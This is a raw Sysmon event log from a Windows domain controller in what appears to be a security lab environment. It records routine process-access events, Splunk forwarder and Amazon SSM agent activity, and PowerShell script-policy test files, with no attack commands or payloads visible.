12:01:06.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.737{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6800-00000000AE01}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.737{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6482-6064-6800-00000000AE01}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.739{266CAFBE-6482-6064-6B00-00000000AE01}4004C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 17141700x80000000000000002803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:06.737{266CAFBE-6482-6064-6A00-00000000AE01}2504\PSHost.132616656666663960.2504.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.721{266CAFBE-6482-6064-6A00-00000000AE01}2504NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_5tdv1jfk.3kb.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.721{266CAFBE-6482-6064-6A00-00000000AE01}2504NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_qjooq0lq.x2n.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.705{266CAFBE-6482-6064-6A00-00000000AE01}2504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_qjooq0lq.x2n.ps12021-03-31 12:01:06.705 10341000x80000000000000002799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6482-6064-6A00-00000000AE01}2504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.669{266CAFBE-647E-6064-4800-00000000AE01}40763036C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6A00-00000000AE01}2504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.667{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.667{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.667{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.667{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.667{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.667{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.667{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.667{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.667{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.666{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6A00-00000000AE01}2504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.666{266CAFBE-647E-6064-4300-00000000AE01}39243756C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{266CAFBE-6482-6064-6A00-00000000AE01}2504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.666{266CAFBE-6482-6064-6A00-00000000AE01}2504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_PnPSignedDriver | Where-Object { $_.DeviceID -eq 'XENBUS\VEN_XS0001&DEV_VBD&REV_00000001\_' -or $_.DeviceClass -eq 'Net' -and ( $_.Manufacturer -like 'Intel*' -or $_.Manufacturer -eq 'Citrix Systems, Inc.' -or $_.Manufacturer -eq 'Amazon Inc.' -or $_.Manufacturer -eq 'Amazon Web Services, Inc.' )}" "| Select-Object" "Description, DriverVersion" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 23542300x80000000000000002785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.643{266CAFBE-6482-6064-6500-00000000AE01}3228NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.627{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6900-00000000AE01}3836C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 